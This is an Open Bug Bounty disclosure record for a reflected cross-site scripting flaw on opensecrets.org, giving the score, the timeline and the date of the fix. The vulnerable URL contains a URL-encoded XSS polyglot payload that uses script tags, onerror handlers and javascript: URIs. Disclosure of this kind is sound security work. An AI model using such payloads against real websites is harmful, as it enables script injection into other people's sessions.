opensecrets.org XSS vulnerability

2017-12-14T11:04:00
ID OBB:453413
Type openbugbounty
Reporter kongwenbin
Modified 2018-02-07T14:13:00

Description

Open Bug Bounty ID: OBB-453413

Description| Value
---|---
Affected Website:| opensecrets.org
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://www.opensecrets.org/search/?q=%22%3E%3E%3Cmarquee%3E%3Cimg+src%3Dx+onerror%3Dconfirm%28%2Fopenbugbounty%2F%29%3E%3C%2Fmarquee%3E%22+%3E%3C%2Fplaintext%5C%3E%3C%2F%7C%5C%3E%3Cplaintext%2Fonmouseover%3Dprompt%28%2Fopenbugbounty%2F%29+%3E%3Cscript%3Eprompt%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%40gmail.com%3Cisindex+formaction%3Djavascript%3Aalert%28%2FXSS%2F%29+type%3Dsubmit%3E%27--%3E%22+%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%22%3E%3Cimg%2Fid%3D%22confirm%26lpar%3B+1%29%22%2Falt%3D%22%2F%22src%3D%22%2F%22onerror%3Deval%28id%26%2523x29%3B%3E%27%22%3E%3Cimg+src%3D%22http%3A+%2F%2Fi.imgur.com%2FP8mL8.jpg%22%3E&cx;=010677907462955562473%3Anlldkv0jvam&cof;=FORID%3A11&__cf_waf_tk__=094189002Tv-QvoulBczo4rBXLA_09OzTh2E
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 14 December, 2017 11:04 GMT
Vulnerability Verified:| 15 December, 2017 07:28 GMT
Website Operator Notified:| 15 December, 2017 07:28 GMT
Vulnerability Published:| 15 December, 2017 07:28 GMT[without any technical details]
Vulnerability Fixed:| 7 February, 2018 14:13 GMT
Public Disclosure:| 7 February, 2018 14:13 GMT